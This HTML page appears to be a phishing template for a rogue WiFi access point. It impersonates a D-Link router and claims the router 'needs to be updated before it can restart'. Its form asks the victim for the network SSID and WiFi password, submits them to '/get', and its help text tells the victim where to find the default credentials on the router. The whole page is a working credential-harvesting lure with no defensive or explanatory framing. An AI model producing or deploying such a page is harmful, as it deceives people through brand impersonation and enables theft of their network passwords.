<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #000000;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #278DA2;
  margin-right: 100px
}

.form-container {
  background: #161622;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #FFFFFF;
  margin-bottom: 20px;
}
h2 {
  text-align: center; 
  font-size: 24px;
  font-weight: 500;
  color: #FFFFFF;
  margin-bottom: 20px;
}


.input-field {
  width: 100%;
  padding: 12px;
  border: 2px solid #278DA2;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #278DA2;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
  display: block;
  margin: auto;
  margin-top: 20px;
}

.submit-btn:hover {
  background: #278DA2;
}

.forgot-password {
  display: block;
  text-align: center;
  color: #FFFFFF;
  text-decoration: underline;
  margin-top: 10px;
}

.error-message {
  color: white;
  text-align: center;
  display: none; 
  margin-top: 10px;
}

</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="256.000000pt" height="51.000000pt" viewBox="0 0 2560.000000 515.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,515.000000) scale(0.100000,-0.100000)"
fill="#278DA2" stroke="none">
<path d="M13342 5140 c-308 -43 -583 -205 -741 -434 -167 -242 -313 -754 -257
-899 33 -86 127 -143 258 -157 86 -8 317 2 452 20 642 88 1098 308 1245 599
50 98 64 162 59 276 -3 97 -6 107 -46 188 -89 180 -284 321 -540 389 -88 23
-324 33 -430 18z"/>
<path d="M21830 5053 c-14 -2 -119 -35 -235 -73 -435 -143 -893 -259 -1305
-330 -153 -26 -188 -36 -219 -64 -35 -32 -222 -352 -228 -392 -8 -46 17 -74
67 -74 20 0 101 9 180 20 194 27 196 27 220 -12 20 -33 20 -51 18 -1738 l-3
-1705 -26 -56 c-33 -70 -76 -93 -198 -107 -67 -8 -89 -15 -108 -34 -28 -29
-176 -412 -168 -438 3 -9 17 -22 31 -28 18 -9 351 -12 1266 -12 l1240 0 37 38
c30 30 50 71 103 212 79 209 80 213 72 234 -11 27 -38 36 -151 46 -199 19
-283 53 -325 133 -22 41 -23 52 -26 347 -2 167 -1 314 3 327 11 46 65 40 128
-15 49 -44 264 -278 377 -411 540 -637 681 -765 935 -849 199 -65 222 -67 940
-67 605 0 655 1 718 19 46 12 79 29 101 50 36 34 255 287 299 343 29 38 35 74
15 90 -7 6 -80 16 -163 22 -231 19 -379 56 -529 133 -47 25 -105 77 -261 233
-185 185 -865 880 -1019 1040 -102 106 -127 166 -103 246 14 47 67 133 109
179 13 14 84 93 157 175 74 83 148 166 165 185 26 29 198 222 330 370 141 159
202 221 231 234 21 10 62 16 112 17 127 0 132 4 261 174 125 166 145 201 131
227 -9 17 -59 18 -895 18 -767 0 -895 -2 -961 -16 -142 -29 -170 -50 -326
-250 -42 -54 -126 -160 -185 -235 -59 -75 -156 -198 -216 -275 -271 -343 -287
-361 -321 -348 -8 4 -17 16 -20 28 -3 11 -6 527 -8 1146 -2 1103 -2 1126 -22
1165 -30 59 -75 85 -144 84 -31 -1 -67 -4 -81 -6z"/>
<path d="M522 4904 c-63 -16 -101 -35 -124 -60 -9 -11 -62 -104 -118 -208 -92
-170 -102 -193 -97 -228 6 -48 29 -75 82 -99 33 -16 66 -19 197 -19 168 0 199
-7 217 -47 8 -17 11 -497 11 -1714 0 -1394 -2 -1695 -13 -1722 -33 -79 -138
-148 -284 -188 -91 -25 -140 -48 -170 -81 -30 -33 -223 -410 -223 -437 0 -35
27 -77 57 -90 22 -9 469 -11 1838 -8 1804 3 1810 3 1943 24 159 27 286 59 419
109 273 102 517 275 690 489 205 254 512 829 737 1377 84 205 100 280 100 473
0 194 -8 228 -105 442 -197 435 -450 899 -682 1248 -146 219 -242 335 -350
423 -256 207 -496 293 -898 321 -90 7 -712 11 -1659 10 -1275 0 -1523 -3
-1568 -15z m2442 -615 c68 -19 117 -79 242 -299 64 -113 125 -218 134 -235 9
-16 124 -217 255 -445 131 -228 243 -424 249 -435 6 -11 46 -81 88 -155 114
-200 129 -276 78 -395 -21 -49 -36 -76 -158 -280 -46 -77 -513 -867 -735
-1243 -46 -78 -93 -130 -141 -154 -38 -20 -59 -22 -288 -26 l-248 -4 0 1800
c0 1118 4 1810 10 1826 18 49 47 55 270 56 118 0 222 -5 244 -11z"/>
<path d="M7973 4874 c-41 -20 -74 -72 -196 -301 -107 -201 -117 -236 -72 -272
40 -30 112 -41 283 -41 86 0 174 -4 195 -9 56 -13 102 -49 128 -100 l24 -46 3
-1600 c2 -1164 0 -1616 -8 -1660 -18 -91 -48 -151 -98 -196 -58 -51 -114 -66
-294 -83 -78 -8 -154 -18 -168 -24 -57 -24 -80 -58 -160 -235 -96 -214 -102
-253 -40 -288 39 -22 4181 -26 4255 -4 74 21 128 64 159 126 l26 53 0 833 c0
696 -2 839 -14 868 -32 76 -82 74 -338 -15 -253 -88 -280 -99 -319 -134 -49
-44 -75 -116 -119 -336 -83 -412 -139 -567 -243 -673 -109 -112 -225 -141
-533 -135 -172 3 -193 5 -231 26 -52 27 -88 74 -103 132 -8 32 -10 508 -8
1690 l3 1645 21 46 c36 77 67 92 213 100 141 9 195 21 235 52 30 25 276 469
276 499 0 31 -18 56 -53 75 -30 17 -116 18 -1412 20 -1248 3 -1383 1 -1412
-13z"/>
<path d="M16680 4084 c-326 -156 -505 -224 -765 -288 -195 -48 -307 -69 -637
-121 -158 -24 -296 -49 -307 -54 -18 -10 -26 -24 -74 -131 -13 -30 -41 -90
-61 -133 -39 -83 -44 -113 -22 -142 12 -16 32 -20 142 -24 145 -7 179 -21 205
-83 21 -49 21 -2377 0 -2456 -17 -67 -52 -109 -96 -118 -19 -3 -39 -11 -44
-18 -15 -18 -171 -419 -171 -439 0 -10 13 -32 29 -48 l29 -29 1086 0 c1191 0
1142 -2 1185 59 20 30 135 320 146 368 8 42 -1 70 -28 85 -12 7 -74 15 -137
18 -128 7 -178 24 -214 73 -21 28 -21 34 -21 1015 l0 987 29 68 c85 201 295
287 482 196 72 -34 133 -107 155 -183 5 -17 9 -506 9 -1093 0 -659 4 -1089 10
-1135 27 -199 169 -358 384 -431 59 -21 83 -21 776 -25 477 -2 727 0 751 7 19
6 45 21 56 33 30 32 155 353 160 410 6 55 9 54 -138 67 -58 6 -117 14 -130 20
-29 10 -85 71 -102 110 -9 19 -13 354 -17 1311 -6 1406 -5 1364 -66 1547 -85
255 -233 401 -475 470 -99 28 -411 25 -574 -5 -149 -28 -278 -63 -415 -112
-157 -56 -200 -75 -580 -248 -306 -140 -332 -148 -344 -116 -3 9 -6 129 -6
267 0 226 -2 256 -19 294 -34 74 -79 81 -191 27z"/>
<path d="M14200 3758 c-69 -42 -267 -136 -380 -181 -376 -147 -781 -240 -1249
-287 -60 -6 -115 -17 -128 -25 -30 -20 -52 -55 -152 -248 -71 -136 -81 -161
-73 -185 13 -40 40 -49 119 -41 117 13 195 10 233 -9 67 -33 64 7 66 -1022 1
-509 -1 -971 -5 -1026 -11 -148 -46 -195 -170 -231 -107 -30 -131 -43 -151
-84 -34 -66 -130 -328 -130 -354 0 -14 9 -34 20 -45 20 -20 33 -20 1176 -20
1260 0 1195 -3 1237 56 24 32 147 351 147 379 0 36 -32 55 -117 69 -139 25
-175 49 -222 146 l-26 55 -5 1500 c-3 825 -6 1501 -8 1502 -1 1 -16 18 -33 38
-26 29 -38 35 -73 35 -24 0 -55 -9 -76 -22z"/>
<path d="M6519 2911 c-62 -24 -125 -69 -179 -127 -44 -47 -356 -548 -385 -619
-33 -77 -11 -156 48 -170 12 -3 360 -4 772 -3 l750 3 55 30 c107 58 181 147
337 405 185 308 203 342 203 395 0 57 -7 73 -41 90 -24 13 -138 15 -771 15
-691 -1 -746 -2 -789 -19z"/>
</g>
</svg>




  </div>

  <div class="form-container">
  <center><h1><b>Your router needs to be updated before it can restart</b></h1>
  <h2>Connect to your WiFi to start the update</h2>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="SSID" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>
	    <a href="javascript:void(0);" class="forgot-password">Where can I find my SSID?</a>
			<div class="error-message"></div>
      <button class="submit-btn" type="submit">UPDATE</button>

    </form>

  </div>

</div>
<script>
  document.querySelector('.forgot-password').addEventListener('click', function() {
    var errorMessage = document.querySelector('.error-message');
    errorMessage.innerHTML = "The SSID, or Service Set Identifier, represents your WiFi network's official name. If you haven't previously set a custom name, the default SSID (and password) can be located on the back panel of your D-Link router.";
    errorMessage.style.display = 'block';
  });
</script>
</meta>
</body>
</html>
